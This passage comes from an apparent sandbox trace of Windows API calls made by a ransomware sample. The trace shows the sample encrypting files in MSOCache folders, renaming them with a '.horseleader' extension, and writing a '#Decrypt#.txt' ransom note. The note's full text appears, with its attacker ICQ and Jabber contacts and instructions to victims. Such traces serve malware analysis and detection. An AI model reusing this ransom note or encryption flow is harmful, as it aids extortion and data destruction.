Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.horseleader") returned 104 [0215.265] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.horseleader")) returned 1 [0215.265] GetProcessHeap () returned 0x780000 [0215.266] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0215.266] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xfc0c60c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0x1cae3c2a, dwReserved1=0xda25b454, cFileName="branding.xml", cAlternateFileName="")) returned 0 [0215.266] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0215.266] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\#Decrypt#.txt") returned 93 [0215.266] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0215.266] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0215.266] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0215.268] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0215.268] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0215.268] CloseHandle (hObject=0x21c) returned 1 [0215.268] GetProcessHeap () returned 0x780000 [0215.268] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0215.268] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa160f00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="AccessMUISet.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0215.268] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="Windows") returned -1 [0215.269] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 83 [0215.269] StrStrIW (lpFirst="AccessMUISet.msi", lpSrch=".horseleader") returned 0x0 [0215.269] lstrcmpW (lpString1="AccessMUISet.msi", lpString2="#Decrypt#.txt") returned 1 [0215.269] lstrcmpW (lpString1="AccessMUISet.msi", lpString2="_uninstalling_.png") returned 1 [0215.269] lstrlenW (lpString=".testttjffg") returned 11 [0215.269] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi", lpSrch=".testttjffg") returned 0x0 [0215.269] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0215.269] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0215.269] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0215.270] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 83 [0215.270] StrStrW (lpFirst="AccessMUISet.msi", lpSrch=".txt") returned 0x0 [0215.270] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=868864) returned 1 [0215.270] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.270] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0215.272] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0215.273] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0215.273] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x67900, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.273] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0215.279] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0215.279] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0215.280] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xcf200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.280] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0215.282] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0215.282] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0215.283] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.283] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0215.283] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0215.283] CloseHandle (hObject=0x21c) returned 1 [0215.283] GetProcessHeap () returned 0x780000 [0215.283] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0215.284] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.horseleader") returned 95 [0215.284] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.horseleader")) returned 1 [0215.285] GetProcessHeap () returned 0x780000 [0215.285] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0215.285] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="AccessMUISet.xml", cAlternateFileName="ACCESS~1.XML")) returned 1 [0215.285] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="Windows") returned -1 [0215.285] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 83 [0215.285] StrStrIW (lpFirst="AccessMUISet.xml", lpSrch=".horseleader") returned 0x0 [0215.285] lstrcmpW (lpString1="AccessMUISet.xml", lpString2="#Decrypt#.txt") returned 1 [0215.285] lstrcmpW (lpString1="AccessMUISet.xml", lpString2="_uninstalling_.png") returned 1 [0215.285] lstrlenW (lpString=".testttjffg") returned 11 [0215.285] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml", lpSrch=".testttjffg") returned 0x0 [0215.285] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0215.285] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0215.285] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0215.286] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 83 [0215.286] StrStrW (lpFirst="AccessMUISet.xml", lpSrch=".txt") returned 0x0 [0215.286] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=819) returned 1 [0215.286] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x333, lpOverlapped=0x0) returned 1 [0215.288] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffffccd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0215.289] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x333, lpOverlapped=0x0) returned 1 [0215.289] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.289] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0215.289] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0215.289] CloseHandle (hObject=0x21c) returned 1 [0215.289] GetProcessHeap () returned 0x780000 [0215.289] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0215.290] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.horseleader") returned 95 [0215.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.xml.horseleader")) returned 1 [0216.007] GetProcessHeap () returned 0x780000 [0216.007] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0216.007] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0216.007] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0216.007] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0216.007] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0216.007] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0216.007] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0216.007] lstrlenW (lpString=".testttjffg") returned 11 [0216.007] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0216.008] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0216.008] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0216.008] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0216.008] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0216.009] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0216.011] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2624) returned 1 [0216.011] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0xa40, lpOverlapped=0x0) returned 1 [0217.155] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff5c0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0217.156] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0xa40, lpOverlapped=0x0) returned 1 [0217.156] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0217.156] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0217.166] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0217.169] CloseHandle (hObject=0x21c) returned 1 [0217.187] GetProcessHeap () returned 0x780000 [0217.187] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0217.187] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0217.187] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0217.227] GetProcessHeap () returned 0x780000 [0217.227] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0217.227] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc111bb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa40, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0217.228] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0217.228] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0217.228] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0217.234] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0217.234] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0217.236] lstrlenA 